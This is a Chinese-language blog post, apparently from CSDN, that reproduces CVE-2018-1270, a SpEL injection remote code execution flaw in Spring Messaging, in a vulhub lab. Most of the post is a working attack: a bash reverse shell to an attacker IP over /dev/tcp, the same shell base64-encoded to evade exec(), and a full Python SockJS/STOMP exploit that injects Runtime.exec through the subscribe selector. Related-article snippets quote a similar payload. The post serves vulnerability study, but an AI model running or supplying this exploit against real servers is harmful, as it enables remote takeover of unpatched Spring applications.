Spring Messaging远程命令执行漏洞复现(CVE-2018-1270)

最新推荐文章于 2024-08-08 07:32:33 发布
最新推荐文章于 2024-08-08 07:32:33 发布
阅读量478 收藏
点赞数
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/132789546
版权

一、漏洞说明
Spring Messaging为Spring框架提供消息支持,用户使用受影响版本的Spring Framework时,允许应用程序通过Spring Messaging模块内存中STOMP代理创建WebSocket。由于selector用SpEL表达式编写,并使用StandardEvaluationContext解析(权限太大),进而导致远程执行代码攻击。
二、影响版本
Spring Framework 5.0 - 5.0.5
Spring Framework 4.3 - 4.3.15
三、搭建环境
在这里插入图片描述在这里插入图片描述

四、漏洞复现
访问:http://192.168.25.128:8080/gs-guide-websocket
在这里插入图片描述

1.准备shell命令
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
绕过exec()编码为:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}

2.修改exp
exploit.py

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
    
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
        
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://192.168.25.128:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

3.nc开启监听
在这里插入图片描述

4.执行exp
在这里插入图片描述

5.反弹shell
在这里插入图片描述

只为了拿0day
关注
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
spring-messaging模块远程代码执行CVE-2018-1270) STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它允许STOMP客户端与任意STOMP消息代理(Broker)进行交互。Spring框架中的...
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 5893
CVE-2018-1270-Spring Messaging RCE漏洞复现
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
mole_exp的博客
02-26 8418
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
CVE-2024-1086 项目使用教程
最新发布
gitblog_00963的博客
08-08 526
CVE-2024-1086 项目使用教程 CVE-2024-1086Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and ...
[JAVA安全]Spring MessagingCVE-2018-1270
snowlyzz的博客
02-19 924
SpEL注入漏洞
spring常见漏洞(4)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-17 877
Spring Messaging 命令执行漏洞(CVE-2018-1270),Spring框架中的模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息来实现远程代码执行
Spring Messaging 远程命令执行漏洞CVE-2018-1270)——漏洞复现
weixin_42090431的博客
11-28 262
2. 用[sockjs协议](https://github.com/sockjs/sockjs-client)发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信。在vulhub中,我们向`/app/hello`发送一个包含name的json,即可触发这个事件。2. 待执行的SpEL表达式,如`T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')`根据你自己的需求修改POC。
spring-messaging-5.0.8.RELEASE-API文档-中文版.zip
06-26
赠送jar包:spring-messaging-5.0.8.RELEASE.jar; 赠送原API文档:spring-messaging-5.0.8.RELEASE-javadoc.jar; 赠送源代码:spring-messaging-5.0.8.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-...
spring-messaging-4.3.20.RELEASE-API文档-中英对照版.zip
04-07
赠送jar包:spring-messaging-4.3.20.RELEASE.jar 赠送原API文档:spring-messaging-4.3.20.RELEASE-javadoc.jar 赠送源代码:spring-messaging-4.3.20.RELEASE-sources.jar 包含翻译后的API文档:spring-...
CVE-2015-1805漏洞验证
05-17
这个漏洞存在于Android的多媒体处理框架中,允许攻击者通过恶意MMS( Multimedia Messaging Service)消息或者特制的媒体文件来执行远程代码,从而对设备进行控制。此漏洞在2015年被公开,影响了当时大量Android设备...
TowelRoot:利用CVE-2014-3153漏洞获得root特权
02-03
首先,我们需要了解CVE-2014-3153,这是一个针对Android多媒体框架的远程代码执行漏洞。Stagefright是Android多媒体处理库的一部分,负责处理MMS( Multimedia Messaging Service)消息中的多媒体内容。攻击者可以...
vulhub中springCVE-2018-1270漏洞复现
yougexiaojiuguan的博客
12-02 499
漏洞复现过程中的记录,方便自己以后查看
Spring RCE漏洞分析1(CVE-2018-1270
hldfight
05-04 8310
0x00 前言 趁着五一休息,分析了一下Spring的历史漏洞,这里记录一下对Spring-Messaging远程代码执行漏洞CVE-2018-1270)的分析。该漏洞涉及到如下概念: 1、WebSocket协议,是HTML5提供的一种可在单个TCP连接上进行全双工通讯的协议。即允许服务端主动向客户端推送数据,详情可以参考这里,讲的挺好的。 2、SockJS,一个JavaScript库,它在浏览...
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 504
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw(zzw@5ecurity.cn)原创发布
vulhub复现spring-messaging远程代码执行漏洞CVE-2018-1270)复现
m0_70483044的博客
07-15 1582
spring-messaging模块为集成messaging api和消息协议提供支持。spring框架中通过spring-messaging模块实现STOMP(Simple Text-Orientated Messaging Protocal)-面向消息的简单文本协议.STOMP是一种封装WebSocket连接并发一条消息造成远程代码执行。STOMP为浏览器和服务器之间的通信增加适当的消息语义。创建好环境我们看一下页面为啥有了http协议还需要webscket协议咧...
Spring Messaging-远程命令执行漏洞CVE-2018-1270
qq_43381463的博客
04-19 496
spring messagingspring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用`StandardEvaluationContext`解析,造成命令执行漏洞
Spring-Messaging远程代码执行漏洞CVE-2018-1270
m0_65150886的博客
12-27 1323
'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')
复现CVE-2018-1270——Spring Messaging 远程命令执行漏洞
记录并分享学习安全的知识点..
01-17 800
一、漏洞概述 spring messagingspring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 二、漏洞复现 发现页面如下: exp如下: x.x.x.x/gs-guide-websocket 我是用dnslog验证的: 用我的方法poc如..
探索CaledoniaProject's CVE-2018-1270: 安全研究与学习的宝贵资源
gitblog_00074的博客
03-31 296
探索CaledoniaProject's CVE-2018-1270: 安全研究与学习的宝贵资源 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是由CaledoniaProject维护的一个开源项目,主要关注的是2018年发现的安全漏洞。这个项目为开发者和安全研究人员提供了一个深入理解、学习和研究已知安全漏洞的实际案例的机会。 技术分析 此项目包含对CVE-2018-...
spring-messaging-5.0.8中文版API文档及源码免费下载
资源摘要信息:"spring-messaging-5.0.8.RELEASE-API文档-中文版.zip" 是一个包含了Spring Framework中文API文档及相关资源的压缩包文件。该资源主要针对使用Spring Messaging模块的Java开发者,提供了一套完整的、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值